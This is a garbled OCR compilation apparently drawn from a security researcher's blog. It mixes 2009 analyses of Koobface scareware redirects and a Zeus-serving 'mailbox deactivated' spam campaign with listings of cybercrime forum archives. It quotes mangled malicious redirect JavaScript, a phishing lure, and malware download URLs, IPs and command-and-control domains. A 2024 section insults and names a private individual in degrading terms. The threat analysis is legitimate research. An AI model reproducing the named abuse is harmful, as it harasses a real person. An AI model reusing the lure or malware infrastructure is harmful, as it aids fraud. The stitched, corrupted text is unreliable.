6/23/2022 6:22 AM WinRAR ZIP archive 
10/21/2022 5:03 PM WinRAR archive 
10/21/2022 4:38 PM WinRAR archive 
10/22/2022 7:43 AM WinRAR archive 
10/21/2022 4:20 PM WinRAR archive 
10/21/2022 3:54 PM WinRAR archive 
[5] 
10/17/2022 5:34 AM WinRAR archive 
6/22/2022 6:27 AM WinRAR archive 
10/16/2019 5:06 PM WinRAR ZIP archive 
9/7/2023 8:41 AM WinRAR ZIP archive 
5/18/2021 2:47 PM WinRAR archive 
12/25/2021 9:18 AM WinRAR archive 
12/25/2021 9:18 AM WinRAR archive 
6/22/2022 12:10 AM WinRAR ZIP archive 
12/25/2021 6:44 AM WinRAR archive 
6/23/2022 6:22 AM WinRAR archive 
6/23/2022 6:22 AM WinRAR archive 
6/23/2022 6:22 AM WinRAR archive 
[6] 


24,294,299 KB 
8,612,249 KB 
562,089 KB 
196,396 KB 
166,586 KB 
95,241 KB 


3,889,042 KB 


721,586 KB 
691,458 KB 
562,089 KB 
392,519 KB 
338,750 KB 
271,104 KB 
268,032 KB 
248,050 KB 
159,028 KB 
129,025 KB 

95,241 KB 

12,161 KB 


63,016,059 KB 
36,081,469 KB 
17,715,627 KB 
9,218,963 KB 
2,814,264 KB 
2,099,796 KB 
2,099,796 KB 
721,586 KB 
691,458 KB 
264,960 KB 
264,192 KB 
262,912 KB 


and domains analyzed in [4]part two of the Koobface Botnet’s Scareware Business Model series. 
The identical structure on a sampled Koobface infected host and a sampled compromised site 
can be seen in the attached screenshots. 


Request Headers ] | 
= Client 
Accept: appliication/onl, applic stion/xcdhitmi+xmi, text/himl:q=0.9,text/plsin;q=0.8, image/png, */*;q=0.S 
Accept-Charset: ISO-6859-1 ,utf-8;q=0.7,*;q=0.3 
Accept-Encoding: gzip,deflate 
Accept-Language: 
User-Agent: 
= Transport 
Connection: keep-alive 
Host: com 


Transformer Headers TextView | SyrtaxView ImageView HexView  WebView Auth Caching Privacy = Raw Bs 


1 var host *1040116111621123058404750476115709980979114012110452115309940975114612170468099911000471" 
2 var pid *"S8s06'; 

3) var sid *9f93be'; 

4 

5 fumetion daNT(¢ 


6 function sNH(J 

? var x new Array (Math. ceii(J. length 4); 

3 for (var & Oo: & x. length; t+ 

9 x(t J.charCodeAt (t * 4) + (J.charCodeAt(t * 4 + 1 8) + (J.charCodeAtit " 4 + 2 16) + (J. char 
10 } 

il return x; 

12 

Pe) function LL2Z(x 

i4 var k nev Array(x. length 

as for (var © Le *. length: ttt 

16 k(t String. fromCharCode(xit) « 288, xit 8 6 288, xit 16 6 288, xit 24 6 288); 

i? 

18 return k.join("* 

i9 

20 function uVB iJ 

21 return J. replace a\d?\da g. 

22 function (¢ 

23 return String. fromCharCode(c.slice(l, «lL v 
< > 


The redirection "magic" takes place through a what looks like a static [5]css.js (Trojan- 
Downloader.JS.FraudLoad) uploaded on all of the affected sites. The very latest blackhat SEO 
once again puts the Koobface gang in the spotlight of the ongoing underground multi-tasking 
that the majority of cybercriminals engage in these days. 


Related posts: 

[6]Koobface Botnet’s Scareware Business Model - Part Two 
[7]Koobface Botnet’s Scareware Business Model - Part One 
[8]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[9]New Koobface campaign spoofs Adobe’s Flash updater 
[10]Social engineering tactics of the Koobface botnet 
[11]Koobface Botnet Dissected in a TrendMicro Report 
[12]Koobface Botnet’s Scareware Business Model 
[13]Movement on the Koobface Front - Part Two 
[14]Movement on the Koobface Front 

[15]Koobface - Come Out, Come Out, Wherever You Are 
[16]Dissecting Koobface Worm’s Twitter Campaign 
[17]Dissecting the Koobface Worm’s December Campaign 
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8 cybercrime Forum_Data_Set_2021 (1) 

HB cybercrime Forum_Data_Set_2021 

8 Cybercrime _Forum_Data_Set_Archive_2019 
83 Dancho_Danchev_Cybercrime_Forum_Data_Set_2021 
$8 evithack.ru 

5 cybercrime Forum_Data_Set_Archive_2021 (1) 
$8 Cybercrime_Forum_Data_Set_Archive_2021 

Eo | Cybercrime_Forums_Compilation_2021_08 (2) 
Eo | Cybercrime_Forums_Compilation_2021_08 

$B gerki.pw 

£8 Protogic 

8 stoForum 

E | ¢-cracking.org 

8 Cybercrime Forums_Compilation_2021_10 
| Cybercrime_Forums_Compilation_2021_09 (1) 
| Cybercrime_Forums_Compilation_2021_09 


co Cybercrime_Forum_Data_Set_Archive_2022 
a | Cybercrime_Forum_Data_Set_2021 
BB Cybercrime_Forum_Data_Set_Archive_2019 


co] Dancho_Danchev_Cybercrime_Forum_Data_Set_2021 


a | Cybercrime_Forum_Data_Set_Archive_2021 
BB Cybercrime_Forums_Compilation_2021_08 
@ Cybercrime_Forums_Compilation_2021_10 
BB Cybercrime_Forums_Compilation_2021_09 
BB Cybercrime_Forums_Compilation_2021_05 


$8 Misc_01 

EB Archive_10 
| Archive_08 
| Archive_07 
EE Archive_02 
| Archive_05 
8 Misc_07 

8 Archive_11 
| Archive_12 
EB Archive_09 
EB Archive_03 
EE Archive_06 
8 Archive_01 
EB Archive_04 


6/22/2022 6:27 AM 

11/11/2021 8:13 AM 
10/16/2019 5:06 PM 
5/14/2021 2:46 AM 

2/21/2020 11:24 PM 
6/22/2022 12:50 AM 
5/18/2021 2:47 PM 

6/22/2022 12:41 AM 
12/25/2021 9:18 AM 
2/22/2020 11:45 AM 
2/21/2020 10:48 PM 
2/21/2020 10:53 PM 
2/21/2020 10:46 PM 
6/22/2022 12:10 AM 
6/22/2022 12:11 AM 
12/25/2021 6:44 AM 


[7] 


10/17/2022 5:34 AM 
6/22/2022 6:27 AM 
10/16/2019 5:06 PM 
5/14/2021 2:46 AM 
5/18/2021 2:47 PM 
12/25/2021 9:18 AM 
6/22/2022 12:10 AM 
12/25/2021 6:44 AM 
6/23/2022 6:22 AM 


[8] 


10/22/2022 7:50 AM 
3/7/2022 7:13 AM 
10/21/2022 2:42 PM 
10/21/2022 5:04 PM 
10/21/2022 5:38 PM 
10/21/2022 5:55 PM 
10/21/2022 5:55 PM 
6/23/2022 6:22 AM 
6/23/2022 6:22 AM 
10/21/2022 5:03 PM 
10/21/2022 4:38 PM 
10/22/2022 7:43 AM 
10/21/2022 4:20 PM 
10/21/2022 3:54 PM 


[9] 


WinRAR archive 
WinRAR archive 
WinRAR ZIP archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR ZIP archive 
WinRAR archive 
WinRAR archive 


WinRAR archive 
WinRAR archive 
WinRAR ZIP archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR ZIP archive 
WinRAR archive 
WinRAR archive 


WinRAR archive 
WinRAR ZIP archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR ZIP archive 
WinRAR ZIP archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 


36,081,469 KB 
36,081,469 KB 
17,715,627 KB 
17,410,869 KB 
4,944,904 KB 
2,814,264 KB 
2,814,264 KB 
2,099,796 KB 
2,099,796 KB 
1,606,892 KB 
1,595,528 KB 
1,513,588 KB 
1,401,852 KB 
721,586 KB 
691,458 KB 
691,458 KB 


63,016,059 KB 
36,081,469 KB 
17,715,627 KB 
17,410,869 KB 
2,814,264 KB 
2,099,796 KB 
721,586 KB 
691,458 KB 
262,912 KB 


3,889,042 KB 
721,586 KB 
691,458 KB 
562,089 KB 
392,519 KB 
338,750 KB 
338,750 KB 
271,104 KB 
268,032 KB 
248,050 KB 
159,028 KB 
129,025 KB 

95,241 KB 
12,161 KB 
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HF host. pw 

| crdpro.cc 

88 ShadowMarket 
| ProxyBase 

| replace.org.ua 
| verified. bz 

$B GoFuckBiz 

| www. forohack.com 
wo | Promarket 

| cardingsite.cc 
| procrd.biz 

| Mr11-11mr.7olm.org 
8 ifud 

£8 Piratebuhta.pw 
ws | ProCrd 

3 Mmpg.ru 

#88 MaulTalk 

EB seOCafe 

| dwh.su 

| venera.bz 

EB it-24h.com 


ws | evilhack.ru 

| gerki.pw 

| ProLogic 

| SEOForum 

| c-cracking.org 
| deeptor.ws 

| Www.opensc.ws 
| gofuckbiz.com 
88 hackademics.fr 
| www.validmarket.se 
| darkmoney.de 
| xaker.name 

| sysadmins.ru 
| carders.se 

| PhreakerPro 

| Master-X 

| Darkmarket.la 
| reversing.cc 

| monopoly.ms 
| blacktip.top 

| ghostmarket.net 


11/7/2021 11:13 PM 
11/7/2021 11:13 PM 
10/9/2021 10:33 PM 
2/21/2020 10:38 PM 
2/22/2020 1:53 PM 

11/7/2021 11:29 PM 
11/7/2021 11:34 PM 
2/21/2020 7:30 PM 

11/7/2021 11:42 PM 
11/7/2021 11:41 PM 
11/7/2021 11:41 PM 
2/21/2020 6:55 PM 

11/7/2021 11:50 PM 
11/7/2021 11:51 PM 
11/7/2021 11:58 PM 
2/21/2020 6:28 PM 

2/21/2020 6:29 PM 

2/21/2020 9:50 PM 

11/8/2021 12:04 AM 
11/8/2021 12:06 AM 
2/22/2020 10:40 AM 


[10] 


11/8/2021 12:34 AM 
11/7/2021 10:19 PM 
11/7/2021 10:06 PM 
2/21/2020 10:53 PM 
2/21/2020 10:46 PM 
10/9/2021 10:28 PM 
11/7/2021 8:19 PM 
11/7/2021 9:41 PM 
2/22/2020 1:59 PM 
10/9/2021 10:30 PM 
2/21/2020 9:52 PM 
2/21/2020 7:51 PM 
2/22/2020 11:58 AM 
11/7/2021 10:26 PM 
2/21/2020 7:07 PM 
2/21/2020 7:20 PM 
11/7/2021 10:53 PM 
2/22/2020 2:02 PM 
2/22/2020 2:24 PM 
2/21/2020 8:59 PM 
11/7/2021 11:12 PM 


WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 


WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 
WinRAR archive 


319,040 KB 
312,976 KB 
293,773 KB 
274,903 KB 
253,944 KB 
242,252 KB 
212,279 KB 
209,136 KB 
201,725 KB 
185,984 KB 
183,620 KB 
183,598 KB 
177,568 KB 
164,887 KB 
136,361 KB 
125,539 KB 
124,127 KB 
116,960 KB 
115,147 KB 
100,012 KB 

97,712 KB 


4,944,904 KB 
1,606,892 KB 
1,595,528 KB 
1,513,588 KB 
1,401,852 KB 
956,822 KB 
730,916 KB 
672,254 KB 
628,311 KB 
606,810 KB 
605,754 KB 
571,800 KB 
492,452 KB 
480,174 KB 
473,840 KB 
464,235 KB 
420,789 KB 
369,387 KB 
364,441 KB 
359,544 KB 
336,607 KB 


1. hbips:/ blogger googleusercontent .coa/ing/b/R20v2D1/AWXsEinJ20q)5pRiQ-OBaN2 Tab hnkadaSe_jIRGAgountV 
2. https://drive. google.com/file/d/13cWsB8cQBE560v2SpHN- 1WXwbQeK313- /view?usp=sharing 


ttps://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEj-7PXV2P7TY35w41s5sztpgHMHyi8Dv1lJ9LqmkDST5bGy4q 
RBHOpeJVAJoGA3m1-_Vdu3xcfg9ciieRH3fb7ERnTk_jiSfy15RgpK 
ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjB11imWh8xwCRck406xUVB1nAFg2CHuZB3-wz0ohUH60FOJR 


4r2M1FdDosTh8IAIuYH81U5LCU0pcDG4qxvRi_xRCpPT8h2pa8dvz 
ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEgdXSToTB2PxTv2q60j QSvZq_GNgBy60U5ZBuQLxzN¢é j yM£C 
a6sFqZRHzwLnvuhOkKQTmtkSITrMcaLOnoj9Qr9_DyRTsCv2M8Dx9 


. https://blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEgI3if 4Nn47as-f_OX2-VwtfC35gNQfFpQvNenETijCNpDz6é 
1NsPqlnN2-vu_ru7 JI2-GxdZK9TAOTegDGYQjBMZ137psUddQViJOP 


ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEiMUagP7 0zf ce7W83Ewh2r1-zCNlyAaz3IKted185MTMs3K 
LSOthw3sMBo06t VUnQhKz1SD5i8216_GYd38zr01PswOwkWgGaq-3 
0. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEgMTRCEAZIONRAV7qFZxVh_yhzxtRiqUksDqBBUip_4udR 


6_f-BAfiZk87DGcSE1HO4goUtxD1UPpHtN9OVP2GId_Y1Y2dgWDKDoAi 


wet 


20.2 February 


20.2.1 A Case Study on a Bulgarian Dipshit Local Drug Addict Gang Member and A 
Peasant From Troyan, Bulgaria Part of The Gang that Robbed and Kidnapped 
and Home Molested Me (2024-02-11 10:48) 


[1] 
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When you’re so dumb that even the "drugs" can’t "catch you". The next thing that follows is 
the laughing. 


ttps://blogger . googleusercontent . com/img/a/AVVXsEiTqidN1ZHYfRH1IMZud09YFai- 1r6mt 1c563pbTqGGcF _KF400wmAM3kP 


6xBXni0-17SRnF 2MvnVKMVitUomm- tWaSMhNK9deQHohXWHJrSn7X 


20.2.2 Petar Shoshkov - Exposing a Bulgarian Troyan City Based Bottom Suck- 


ing Gang Member That Robbed Home Molested and Kidnapped Me 
(2024-02-11 10:48) 


[1] 
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[2] 
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[3] 
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Is it the "lack" of or the lack of? 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEj QIGSLmJwEdLAKb_o2Rky02dcp8QZyi-MgMG9RuVf£AX0zxeM1cSkTp8s 
7DDpjGan_qGrzF8N3BbC- dvX35cy0k6FFLZF- aRWyJ-RJOn_ZxSbOu 
2. https: //blogger .googleusercontent .com/img/a/AVvXsEi2vy jacfk9R70vNyCZol2r5svywtrSZ5HBCJiheGhongreXOUt2jKm-1 
GYNNQFAkyFeik47Nb7HxIXwtFnOhcmu1 11w0710wNv2JTZdmqwUDmO 
3. https: //blogger . googleusercontent .com/img/a/AVvXsEhbrLm0-8f2eL_b7SnQhogCh82WSmpKkuZ5LxSgVQx8d17 iQhI3bGX5kU7 
L-SpcOMVSP16431se2uZgkiv4j32ecvL59d4f 5VoYBd59p57 pavMUz 


20.2.3 The Ugliest Bulgarian Wannabe Law Enforcement Officer Real Life "Cop" In 
the Bulgarian "System" (2024-02-11 10:48) 


[1] 
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[2] 


Can you suck my bottom? Do you have the permission of other people to do it before you suck 
mine? Do you know what does this constitutes? Let’s play a game. If my bottom is in the 
ugliest and most disgusting part of the universe and you want to suck it does this mean that 
you're there too? You don’t exist. 


We in the face of your parents should rather pay you to best yourself and stop existing and 
make a free low profile non-existent and cheap movie out of it which is something that you 
shouldn’t forget doesn’t constitute anything. It’s the very art of having you beat yourself 
courtesy of your parent’s money and having the very same non-existent Bulgarian dipshits 
pay you to beat yourself. While beating yourself you can easily forget about compilations 
and series of movies about your beating simply because your very ugliness and disgusting 
existence doesn’t compare to that of a human being. 


1, fivtpa; //blogger googleuser content. con/ing/a/AVvXsEaRIBAV- gM OX¥y_ GT NBciDSTOcZj26L ynQaTby 92€6WoGieabqeT 
2, hictpe; //blogger .googleusercontent con/ing/a/AVwXsEARIBIN- gH ORVy_Gtgl6ciDSTO02 jaya JO2KGWWoGI@DgeT 
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[18]Dissecting the Latest Koobface Facebook Campaign 
[19]The Koobface Gang Mixing Social Engineering Vectors 


This post has been reproduced from [20]Dancho Danchev's blog. 


1 
2 

3 

4 

5 
8 

6 

7 

2 

9 

10. 

11. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 

12. 

13. 

14, 


15. http: //ddanchev. blogspot . com/2009/07/koobface- come- out-come-out-wherever-you.htm 
16. http: //ddanchev. blogspot . com/2009/07/dissecting-koobface-worms-twitter .htm 


17. http: //ddanchev.blogspot . com/2008/12/dissecting-koobface-worms-december . htm 
18. http: //ddanchev.blogspot .com/2008/11/dissecting-latest-koobface- facebook. htm 


19. http: //ddanchev. blogspot . com/2008/12/koobface-gang-mixing-social-engineering .htm 


20. http://ddanchev.blogspot.com/ 
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5.11.8 Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
(2009-11-17 22:36) 


riot 
>i 
ot 
> 
ot 
of 
> 
>f 
of 
> 
> 
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[1]JAli Baba and the 40 thieves LLC are once again multi-tasking, this time compromising 
[2]hundreds of thousands of web sites, and redirecting Google visitors - through the standard 


http referrer check - to [3]Scareware serving domains. 


<html> 
LABEL CODE 

<head> 

<title>Loading</title> 

bots” centent*“noindex, nofollow, soarchive™> 


ocat ion location; ) catch (e) ()) window. onerror*handlefrroc; if (vind 


n bandlefrrorc () (try window. parent. tocation=location;) catch 


</script> 


<weript> 
console*yes' 


* Window. savigator.userAgent: var mssie * ua.ind 


¢(*SSI£' 
ry { document. getElement Dyid(' ite’). iaunc 
y e ’ 


oviedr) { if (ws 


penDanger¥s 
edow (danger ¥indade) : 


tw h exiter()( openDanger Window (window. location. hr ise: 
it jow.attechEvent) eval ("windov.attechEvent ('onu else vindov.eddiventl “unload”, exiter, false): 
</woript> 
<acript Ctype**text/ Javascript ">document .wrs **te* widthe"0O" hesght*"0" style**position: absolute ec O;t 4] tas’ "cLs 
<soript Language" )avasc 
<meript language=" 
ver isIE = (p t false: 
var iaV¥in - -3) ? true : taise; 
true : false: 


var isOpera © 
function Contro 
var version: 
var oxo; 
var e: 
try { 
axo * new ActiveXcbject (“ShockwaveF lash. ShockwaveF lash. 7"): 
version = axo,GetVariable(*fversion"); 
) catch fe) 6) 
if ('version) 


What’s so special about the domains mentioned in Cyveillance’s post, as well as the ones 
currently active on this campaign? It’s the Koobface connection. 


For instance, the ionisationtools .cn or moored2009 .cn redirectors, as well as the scare- 
ware serving premium-protection6 .com; file-antivirus3.com; checkalldata .com; foryoumal- 
warecheck4 .com; antispy-scan1 .com mentioned in post, are the same scareware redirectors 
and domains analyzed in [4]part two of the Koobface Botnet’s Scareware Business Model series. 
The identical structure on a sampled Koobface infected host and a sampled compromised site 


can be seen in the attached screenshots. 
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Request Headers 
= Client 
Accept: application/ionll, application) xhtml+smi, text/hter;q=0.9,text/pksin;q=0.8, image/png, */*;q=0.S 
Accept-Charset: IS0-8859-1,utf-8;q=0.7,";q=0.3 
Accept-Encoding: gzip, deflate 
Accept-Language: 
User-Agent: 
= Transport 
Connection: heep-alive 
Host: com 


Transformer Headers  TextView | SyrtaxView  ImageView  HexView  WebView Auth Caching Privacy Row XML 


1 var host *1040116111621123058404750476115709980979114012110452115309940975114612170468099911000471" ; 
2 var pid *58s06'; 
3\var sid *9f93be'> 


5 function daNT(¢ 

6 function sNH(J) 

7 var x nev Array (Math. ceil(J.length 4 

8 for (var © ot x. length: tt? 

3 x(t J.charCodeAt (t * 4) + (J.charCodeAtit * 4 + 1 8) + (J.charCodeAtit * 4+ 2 16) + (J. charC 
a0 

il return x; 

12 

13 function LLZ(x) 
i4 var k nev Array (x. length) ; 

a5 for (var © Oo: t x. length: ttt 

16 k(t String. fromCharCode(x(t} «4 285, xit 86 288, xit 16 6 288, xit 24 6 285); 

a7 } 

18 return k.join("* 

i3 

zo function uVE(J) { 
21 return J. replace a\d?\d g- 

22 function (ec 

23 return String. fromCharCode(c.slice(l, «1)); v 
< > 


The redirection "magic" takes place through a what looks like a static [5]css.js (Trojan- 
Downloader.JS.FraudLoad) uploaded on all of the affected sites. The very latest blackhat SEO 
once again puts the Koobface gang in the spotlight of the ongoing underground multi-tasking 
that the majority of cybercriminals engage in these days. 


Related posts: 

[6]Koobface Botnet’s Scareware Business Model - Part Two 
[7]Koobface Botnet’s Scareware Business Model - Part One 
[8]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[9]New Koobface campaign spoofs Adobe’s Flash updater 


[10]Social engineering tactics of the Koobface botnet 
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[11]Koobface Botnet Dissected in a TrendMicro Report 
[12]Koobface Botnet’s Scareware Business Model 
[13]Movement on the Koobface Front - Part Two 
[14]Movement on the Koobface Front 

[15]Koobface - Come Out, Come Out, Wherever You Are 
[16]Dissecting Koobface Worm’s Twitter Campaign 
[17]Dissecting the Koobface Worm’s December Campaign 
[18]Dissecting the Latest Koobface Facebook Campaign 


[19]The Koobface Gang Mixing Social Engineering Vectors 


This post has been reproduced from [20]Dancho Danchev’s blog. 
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ttp://www.virustotal.com/analisis/7892e2b09d887a66a4d70e49a08f eef 36f4dbda6cc605d2e1191613b87a863be- 12584 
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ity/?p=4594 

10. http://content .zdnet .com/2346-12691_22-352597 .htm 

11. http://ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro. html 
12. http://ddanchev. blogspot .com/2009/09/koobface-botnets-scareware-business.htm 

13. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front-part-two.htm 

14. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front.htm 

15. http://ddanchev. blogspot .com/2009/07/koobface-come-out- come-out-wherever-you. htm 
16. http://ddanchev. blogspot .com/2009/07/dissect ing-koobface-worms-twitter.htm 

17. bttp://ddanchev. blogspot .com/2008/12/dissecting-koobface-worms- december .htm 


18. http://ddanchev. blogspot .com/2008/11/dissecting-latest-koobface- facebook. htm 


ttp://ddanchev. blogspot .com/2008/12/koobface-gang-mixing-social-engineering. html 


20. http://ddanchev.blogspot.com/ 
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5.11.9 "Your mailbox has been deactivated" Spam Campaign Serving Crimeware 
(2009-11-17 23:11) 


An ongoing [1]"Your mailbox has been deactivated" themed [2]spam campaign is pushing 
crimeware as an attached [3]utility.zip archive. 


Subject: your mailbox has been deactivated 

Message: "We are contacting you in regards to an unusual activity that was identified in your 
mailbox. As a result, your mailbox has been deactivated. To restore your mailbox, you are 
required to extract and run the attached mailbox utility. Best regards, hush.com technical 
support." 

Different signatures used: "From Webmail Help Desk; From hush.com technical support; From 
msmvps.com technical support; From ahnlab.com technical support; From symantec.com 
technical support" 
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Sampled obtained phones back to 193.104.27  .91/limpopo/bb.php?id=636608811 
&v=200 &tm=2 &b=4316315581; 193.104.27 .91/limpopo/bb.php?id=554275088 
&v=200 &tm=8 &b=4316315581 &tid=11 &r=1, from where it downloads [4]promed- 
net .com/css/abs.exe (97.74.144.118; Email: ninemed@ninemedical.com ) which 
phones back to 231307d91138.bauhath.com/get.php?c=QPTUDBSV &d=, downloading 
[5]91.213.72 .51/Idr7.exe which phones back to 193.104.27 .42/Icc/ip2.gif which is Tro- 
jWare.Win32.TrojanSpy.Zbot.Gen 


[6]AIl of these IPs are [7]not surprisingly known Zeus [8]crimeware hosts. 


Related phone-back locations parked on the same IP - [9]94.75.221.76: 
koralda .com - Email: owner@koralda.com 

antiona .com - Email: owner@antiona.com 

lambrie .com - Email: owner@lambrie.com 

bauhath .com - Email: owner@bauhath.com 

agulhal .com - Email: owner@agulhal.com 

lantzel .com - Email: owner@lantzel.com 

bourgum .com - Email: owner@bourgum.com 


101607d91120.koralda .com 
141607d91121.koralda .com 
121607d91122.koralda .com 
161607d91123.koralda .com 
141607d91124.koralda .com 
181607d91125.koralda .com 
011607d91106.koralda .com 
171507d91116.koralda .com 
161607d91126.koralda .com 
231507d91107.koralda .com 
201607d91127.koralda .com 
031607d91108.koralda .com 
191507d91118.koralda .com 
011607d91109.koralda .com 
171507d91119.koralda .com 
221607d91129.koralda .com 
201607d9112a.koralda .com 
031607d9110b.koralda .com 
191507d9111b.koralda .com 
081607d9111b.koralda .com 
221607d9112c.koralda .com 
101607d9111d.koralda .com 
081607d9111e.koralda .com 
121607d9111f.koralda .com 
211507d91131.antiona .com 
231507d91133.antiona .com 
081207d91134.antiona .com 
121607d91115.antiona .com 
001307d91106.antiona .com 
201307d91108.antiona .com 
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121107d91128.antiona . 


com 


021107d91129.antiona .com 


221307d9110a.antiona . 


231107d9111a.antiona . 


com 


com 


230907d9111b.antiona .com 
041107d9112b.antiona .com 


011207d9111c.antiona. 


com 


081307d9110d.antiona .com 


061107d9112d.antiona . 
191407d9112d.antiona . 


com 
com 


171307d9111f.antiona .com 
211407d9112f.antiona .com 
042707d90914.agrigid .com 


101607d91121.lambrie . 
121607d91122.lambrie . 
141607d91124.lambrie . 
161607d91126.lambrie . 
231507d91107.lambrie . 
181607d91128.lambrie . 
011607d91109.lambrie . 
171507d91119.lambrie . 
201607d9112a.lambrie . 
031607d9110b.lambrie . 
191507d9111b.lambrie . 
221607d9112c.lambrie . 
081607d9111e.lambrie . 
081607d91100.bauhath 
071607d91130.bauhath 
121607d91101.bauhath 
201607d91111.bauhath 
221307d91102.bauhath 
051107d91122.bauhath 
141607d91103.bauhath 
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com 
com 
com 
com 
com 
com 
com 
com 
com 
com 
com 
com 
com 
.com 
com 
:com 
.com 
com 
com 
.com 


123.lantzel.com 


d91127.lantzel 
127.lantzel.com 


om 


221607d91113.bauhath .com 
221307d91104.bauhath .com 
071107d91124.bauhath .com 
171207d91115.bauhath .com 
051007d91126.bauhath .com 
091107d91126.bauhath .com 
101607d91107.bauhath .com 
191207d91117.bauhath .com 
051207d91127.bauhath .com 
071007d91128.bauhath .com 
071207d91128.bauhath .com 
121607d91109.bauhath .com 
211207d91119.bauhath .com 
091007d9112a.bauhath .com 
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131107d9112a.bauhath 
091207d9112a.bauhath 
051607d9113a.bauhath 
231207d9111b.bauhath 
091607d9113b.bauhath 
141607d9110c.bauhath 
111007d9112c.bauhath 
111207d9112c.bauhath 
161607d9110d.bauhath 
071607d9112d.bauhath 
181607d9110f.bauhath 

181007d91132.edvehal 
181007d91135.edvehal 
181207d91110.agulhal 

091007d91120.agulhal 

211007d91130.agulhal 

041307d91130.agulhal 


111007d91122.agulhal 
061307d91132.agulhal 
131207d91123.agulhal 
131007d91124.agulhal 
151207d91125.agulhal 
230907d91116.agulhal 
151007d91126.agulhal 
061207d91127.agulhal 
011007d91118.agulhal 
171007d91128.agulhal 
031007d9111a.agulhal 
021207d9111b.agulhal 
121107d9113b.agulhal 
051007d9111c.agulhal 
011107d9110d.agulhal 
041207d9111d.agulhal 
191007d9112d.agulhal 
161207d9110e.agulhal 
071007d9111e.agulhal 
141607d91100.lantzel 
081607d91100.lantzel 
221607d91110.lantzel 
121607d91101.lantzel 
171207d91111.lantzel 
201607d91111.lantzel 
071107d91121.lantzel 
051107d91122.lantzel 
141607d91103.lantzel 
151207d91113.lantzel 
191207d91113.lantzel 
221607d91113.lantzel 
051007d91123.lantzel 


2870 


.com 
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.com 


.com 
com 
.com 


.com 


com 
com 
.com 
com 
.com 


com 
com 
com 
.com 
.com 
com 
com 
.com 
.com 
.com 
com 
com 
com 


091107d91123.lantzel .com 
051207d91123.lantzel .com 
101607d91104.lantzel .com 
071107d91124.lantzel .com 
211207d91115.lantzel .com 
171207d91115.lantzel .com 
071007d91125.lantzel .com 
111107d91125.lantzel .com 
071207d91125.lantzel .com 
121607d91106.lantzel .com 
051007d91126.lantzel .com 
091107d91126.lantzel .com 
051207d91126.lantzel .com 
101607d91107.lantzel .com 
231207d91117.lantzel .com 
191207d91117.lantzel .com 
091007d91127.lantzel .com 
131107d91127.lantzel .com 
091207d91127.lantzel .com 
051607d91137.lantzel .com 
141607d91108.lantzel .com 
071007d91128.lantzel .com 
111107d91128.lantzel .com 
071207d91128.lantzel .com 
091607d91138.lantzel .com 
121607d91109.lantzel .com 
211207d91119.lantzel .com 
111007d91129.lantzel .com 
111207d91129.lantzel .com 


071607d91139.lantzel .com 
161607d9110a.lantzel .com 
091007d9112a.lantzel .com 
131107d9112a.lantzel .com 
091207d9112a.lantzel .com 
111607d9113a.lantzel .com 
051607d9113a.lantzel .com 
141607d9110b.lantzel .com 
231207d9111b.lantzel .com 
091607d9113b.lantzel .com 
181607d9110c.lantzel .com 
111007d9112c.lantzel .com 
111207d9112c.lantzel .com 
161607d9110d.lantzel .com 
201607d9110e.lantzel .com 
151207d9110f.lantzel .com 
181607d9110f.lantzel .com 
051107d9111f.lantzel .com 
131507d91100.bourgum .com 
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231507d91130.bourgum .com 
221207d91101.bourgum .com 


211507d91131.bourgum .com 
001307d91103.bourgum .com 
231507d91133.bourgum .com 
001107d91124.bourgum .com 
081207d91134.bourgum .com 
201307d91105.bourgum .com 
121607d91115.bourgum .com 
001307d91106.bourgum .com 
021107d91126.bourgum .com 
091207d91107.bourgum .com 
221307d91107.bourgum .com 
231107d91117.bourgum .com 
201307d91108.bourgum .com 
230907d91118.bourgum .com 
121107d91128.bourgum .com 
041107d91128.bourgum .com 
211007d91138.bourgum .com 
011207d91119.bourgum .com 
021107d91129.bourgum .com 


Naturally, the campaign isn’t an isolated incident, with [10]previous "Facebook updated 
account agreement" themed ones, using the same phone back locations as the currently 
ongoing one. 


Related posts: 
[11]Ongoing FDIC Spam Campaign Serves Zeus Crimeware 
[12]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


This post has been reproduced from [13]Dancho Danchev’s blog. 


1. bapi//osareh, twitter con/somrentgraaiibomanactivated 
2. heap: //w. sophos.con/tLogs /ge/g/2009/11/17/naitbox- deactivated] 
3 
503 

4 


12750 


5. 

6 
7. 
8 
9. ; 


ttp://whois.domaintools.com/94.75.221.76 


ttp://www.virustotal.com/analisis/39d8ad95b0323c37bd3134ab93ac4af 44c66a1a8443a41clac02cec19bb2816a- 12584 


10. http: //blog.mxlab.eu/2009/11/07/facebook-updated-account-agreement-email-contains-sasfis-trojan/ 


